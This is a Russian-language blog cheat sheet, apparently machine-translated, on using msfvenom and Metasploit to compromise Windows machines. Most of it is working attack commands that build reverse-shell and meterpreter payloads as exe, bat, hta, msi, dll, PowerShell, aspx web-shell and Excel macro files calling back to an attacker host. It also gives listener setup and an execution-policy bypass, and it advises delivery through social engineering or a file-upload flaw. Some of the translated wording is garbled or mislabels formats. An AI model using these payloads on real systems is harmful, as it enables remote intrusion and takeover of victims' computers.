Шпаргалка по Msfvenom: Эксплуатация в Windows

Шпаргалка по Msfvenom: Эксплуатация в Windows

В этой статье вы узнаете, как использовать MsfVenom для создания всех типов полезных данных для использования платформы Windows. Прочтите руководство для начинающих отсюда.А в этой статье рассмотрим Шпаргалка по Msfvenom: Эксплуатация в Windows

Требования:

      • Kali Linux
      • Windows Machine

Синтаксис MsfVenom

MsfVenom — это автономный генератор полезной нагрузки Metasploit, который также является заменой msfpayload и msfencode.

Полезная нагрузка и ее типы

Полезная нагрузка — это вредоносные сценарии, которые злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезной нагрузки. Формат вывода может быть в виде исполняемых файлов, таких как exe, php, dll, или в виде однострочного файла.

Два основных типа полезной нагрузки

Stager: они обычно обозначаются вторым (/), например windows / meterpreter / reverse_tcp.

Stageless: использование _ вместо второго / в имени полезной нагрузки, например windows / meterpreter_reverse_tcp

Шпаргалка по Msfvenom: Эксплуатация в Windows

Как мы уже упоминали выше, эта статья может помочь вам изучить все возможные методы создания различных форматов полезной нагрузки для использования платформы Windows.

Исполняемая полезная нагрузка (exe)

Тип полезной нагрузки: Stager

Выполнение следующей команды для создания вредоносного exe-файла — это распространенное расширение имени файла, обозначающее исполняемый файл для Microsoft Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe

Весь вредоносный код будет записан внутри файла shell.exe и будет выполняться на целевой машине как исполняемая программа.

Шпаргалка по Msfvenom: Эксплуатация в Windows

Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения цели. Тем временем запустите netcat в качестве прослушивателя для перехвата обратного соединения.

nc –lvp 443

Шпаргалка по Msfvenom: Эксплуатация в Windows

Пакетный файл Powershell

Тип полезной нагрузки: Stager

Выполните следующую команду, чтобы создать вредоносный пакетный файл, расширение имени файла .bat используется в DOS и Windows.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat

Весь вредоносный код будет записан внутри файла shell.bat и будет выполняться как сценарий .bat на целевой машине.

Шпаргалка по Msfvenom: Эксплуатация в Windows

Поделитесь этим файлом с помощью тактики социальной инженерии и дождитесь выполнения цели. Тем временем запустите netcat в качестве прослушивателя для перехвата обратного соединения.

nc –lvp 443

Шпаргалка по Msfvenom: Эксплуатация в Windows

Полезные данные приложения HTML (HTA)

Тип полезной нагрузки: Stager

Приложение HTML (HTA) — это программа Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков сценариев, поддерживаемых Internet Explorer, например VBScript или JScript.

Выполните следующую команду, чтобы создать вредоносный файл HTA, расширение файла .hta используется в DOS и Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Весь вредоносный код будет записан внутри файла shell.hta и будет выполняться как сценарий .hta на целевой машине. Используйте HTTP-сервер Python для обмена файлами.

Шпаргалка по Msfvenom: Эксплуатация в Windows

mshta http://192.168.1.3/shell.hta

HTA выполняется с помощью программы mshta.exe или двойным щелчком по файлу.

Шпаргалка по Msfvenom: Эксплуатация в Windows

Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.

nc –lvp 443

Шпаргалка по Msfvenom: Эксплуатация в Windows

Полезные данные установщика Microsoft (MSI)

Установщик Windows также известен как установщик Microsoft. Файл MSI — это пакет Windows, который предоставляет информацию об установке для определенного установщика, например программы, которые необходимо установить. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения, такого же как exe.

Выполните следующую команду, чтобы создать вредоносный файл MSI, расширение имени файла .msi используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi

Шпаргалка по Msfvenom: Эксплуатация в Windows

Используйте команду msiexec для запуска файла MSI.

msiexec /quiet /qn /i shell.msi

Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.

Шпаргалка по Msfvenom: Эксплуатация в Windows

Полезная нагрузка библиотеки динамической компоновки (DLL)

Тип полезной нагрузки: Stager

DLL — это библиотека, содержащая код и данные, которые могут использоваться более чем одной программой.

Выполните следующую команду, чтобы создать вредоносный файл DLL, расширение файла .dll используется в DOS и Windows. Перенести вредоносную программу в целевую систему и запустить ее.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll

Шпаргалка по Msfvenom: Эксплуатация в Windows

Используйте команду rundll32 для запуска файла MSI.

rundll32.exe shell.dll,0

Шпаргалка по Msfvenom: Эксплуатация в Windows

Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.

Шпаргалка по Msfvenom: Эксплуатация в Windows

Полезные данные Powershell (psh-cmd)

Тип полезной нагрузки: Stager

Формат — psh, psh-net, psh-reflection или psh-cmd.

Сгенерированная полезная нагрузка для форматов psh, psh-net и psh-reflection имеет расширение .ps1, а сгенерированная полезная нагрузка для формата psh-cmd имеет расширение .cmd. В противном случае вы можете напрямую выполнить необработанный код внутри командной строки целевой системы.
 
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw
 
Выполните следующую команду, чтобы сгенерировать необработанный код для вредоносной программы PowerShell.
 
Шпаргалка по Msfvenom: Эксплуатация в Windows
 
Для выполнения скопируйте сгенерированный код и вставьте его в командную строку Windows.
 
Это приведет к обратному соединению через прослушиватель netcat, который работал в фоновом режиме для перехвата обратного соединения.
 

Полезная нагрузка Powershell (ps1)

Тип полезной нагрузки: Stager

Файл PS1 — это сценарий или «командлет», используемый Windows PowerShell. Файлы PS1 похожи на файлы .BAT и .CMD, за исключением того, что они выполняются в Windows PowerShell вместо командной строки Windows.

Выполните следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла. PS1 используется в Windows PowerShell.

msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1

Поскольку обратный тип оболочки — meterpreter, нам нужно запустить эксплойт / мульти / обработчик внутри фреймворка Metasploit.

Политика выполнения PowerShell — это функция безопасности, которая контролирует условия, при которых PowerShell загружает файлы конфигурации и запускает сценарии. Эта функция помогает предотвратить выполнение вредоносных скриптов. Запрещает запуск всех файлов сценариев, включая файлы форматирования и конфигурации (.ps1xml), файлы сценариев модулей (.psm1) и профили PowerShell (.ps1).

Подробнее читайте здесь

Чтобы выполнить сценарий PS1, вам необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и выполнив сценарий.

PowerShell –ep bypass
.\shell.ps1
 
 
 
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
 
Как только цель выполнит сценарий shell.ps1, злоумышленник получит обратное соединение через сеанс повторителя счетчика.
 
 

Полезная нагрузка веб-оболочки (ASPX)

Тип полезной нагрузки: бесступенчатый

Файл ASPX — это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса эти страницы отображаются в веб-браузере пользователя. Другое название для них — веб-формы .NET.

Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением файла .aspx.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx

Поскольку обратный тип оболочки — meterpreter, нам нужно запустить эксплойт / мульти / обработчик внутри фреймворка metasploit.

Вы можете внедрить эту полезную нагрузку для использования уязвимости неограниченной загрузки файлов, если целью является веб-сервер IIS.

Выполните сценарий загрузки в веб-браузере.

msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https
 
Как только злоумышленник выполнит вредоносный скрипт, он получит обратное соединение через сессию метерпредставителя.
 
 

Полезные данные Visual Basic (.vba)

Тип полезной нагрузки: бесступенчатый

VBA — это расширение файла, обычно связанное с Visual Basic, которое поддерживает такие приложения Microsoft, как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания «макросов». который работает в Excel. Злоумышленник пользуется привилегиями этих функций и создает вредоносный сценарий VB, который будет выполняться как программа макросов с Microsoft Excel.

Выполните следующую команду, чтобы создать вредоносный сценарий aspx с расширением имени файла .aspx, который будет выполняться как макрос в Microsoft Excel.

Подробнее читайте здесь: Несколько способов использования систем Windows с помощью макросов

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba

Теперь мы открываем нашу рабочую книгу, в которую внедрены вредоносные макросы.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit

Как только злоумышленник выполнит вредоносный скрипт, он получит обратное соединение через сессию метерпредставителя.

Заключение

Конечной целью является полная автоматизация msfvenom и Metasploit для упрощения жизни пользователя (меню выбора IP, ресурсного файла/команд msfconsole, пакетное создание полезной нагрузки и возможность вводить любые аргументы в любом порядке (в различных форматах/шаблонах).

 

 

 
 

 

 

 

 

 

 

 

 

 

 
Click to rate this post!
[Total: 1 Average: 5]

Leave a reply:

Your email address will not be published.